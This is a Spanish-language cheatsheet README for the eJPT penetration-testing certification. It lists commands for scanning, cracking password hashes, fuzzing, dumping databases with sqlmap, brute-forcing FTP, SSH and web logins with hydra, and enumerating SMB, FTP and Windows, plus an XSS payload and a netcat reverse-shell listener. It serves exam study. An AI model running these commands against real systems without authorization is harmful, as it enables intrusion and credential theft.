H1

└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | # eJPT-Cheatsheet
  2 | Todos los comandos necesarios para aprobar el eJPT
  3 | 
  4 | Recursos que te pueden interesar:
  5 | - [eJPT - Review](https://hacknotes.github.io/certificaciones/eJPTReview/) 
  6 | - [Aprobar el eJPT a la primera](https://hacknotes.github.io/certificaciones/eJPTAprove/)
  7 | # Barrido de ping - Ping sweep
  8 | ## Nmap
  9 | ```sql
 10 | nmap -sn 10.10.10.0/24
 11 | ```
 12 | ## fping
 13 | ```sql
 14 | fping -a -g 10.10.10.0/24 2>/dev/null
 15 | ```
 16 | # Password cracking
 17 | ## John
 18 | ```python
 19 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
 20 | ```
 21 | ## Online Tools
 22 | [CrackStation](https://crackstation.net/)
 23 | # Dump Hashes
 24 | ## unshadow 
 25 | ```sql
 26 | unshadow passwd shadow > hashes.txt
 27 | ```
 28 | # Fuzzing
 29 | ## Nmap
 30 | ```python
 31 | nmap --script=http-enum -p80 10.10.14.16 -oN webScan
 32 | ```
 33 | ## wfuzz
 34 | ```python
 35 | wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ
 36 | wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ.php
 37 | ```
 38 | ## dirb
 39 | ```sql
 40 | dirb http://10.10.15.12
 41 | ```
 42 | ## gobuster
 43 | ```sql
 44 | gobuster dir -u 10.10.14.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
 45 | ```
 46 | # SQLMap
 47 | ```sql
 48 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id
 49 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id --dbs
 50 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname --tables
 51 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname -T table_name --dump
 52 | ```
 53 | # Hydra
 54 | ```sql
 55 | hydra -v -l admin -P passlist.txt ftp://192.168.0.1
 56 | hydra -v -L userlist.txt -P passlist.txt ftp://192.168.0.1
 57 | hydra -v -l root -P passwords.txt -t 1 -u 10.10.14.10 ssh
 58 | hydra http://10.10.14.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect" -L userlist.txt -P passwordslist.txt
 59 | ```
 60 | # XSS
 61 | ```sql
 62 | <script>alert(xss)</script>
 63 | <h1>H1</h1>
 64 | ```
 65 | # SMB
 66 | ## Enumeración de SMB
 67 | ```python
 68 | smbclient -L 10.10.14.12 -N
 69 | smbmap -H 10.10.14.12 -u 'null'
 70 | nmap --script=smb-vuln* -p445 10.10.14.15 -oN smbScan
 71 | smbmap -H 10.10.14.15 -R backups -u 'null'
 72 | ```
 73 | ## Acceso al recurso compartido **backups**
 74 | ```sql
 75 | smbclient //10.10.14.15/backups
 76 | ```
 77 | # FTP
 78 | ## Enumeración de FTP
 79 | ```python
 80 | nmap --script=ftp-anon -p21 10.10.14.12
 81 | ftp 10.10.14.12
 82 | cd ..
 83 | ```
 84 | ## FTP - Fuerza Bruta
 85 | ```sql
 86 | hydra -l admin -P passlist.txt ftp://192.168.0.1
 87 | hydra -L userlist.txt -P passlist.txt ftp://192.168.0.1
 88 | ```
 89 | # Enumeración de windows
 90 | ```sql
 91 | dir /b/s "\*.conf*"
 92 | dir /b/s "\*.txt*"
 93 | dir /b/s "\*secret*"
 94 | route print
 95 | netstat -r
 96 | fsutil fsinfo drives
 97 | wmic logicaldisk get Caption,Description,providername
 98 | ```
 99 | # Reverse Shell
100 | ## nc
101 | ```sql
102 | nc -nlvp 443
103 | ```
104 | ## metasploit
105 | ```sql
106 | msfconsole
107 | ```
108 | # Post Explotación
109 | ## Pivoting
110 | ### Ip Route
111 | ```sql
112 | ip route add 10.10.16.0/24 via 10.10.16.1 dev tap0
113 | ```
114 | ### Metasploit
115 | ```sql
116 | run autoroute -s 10.10.16.0/24
117 | ```
118 | ## Wireshark
119 | ```sql
120 | ip.addr==192.168.12
121 | ip.src == 192.168.2.11
122 | ip.dst == 192.168.2.15
123 | ```
124 | 


--------------------------------------------------------------------------------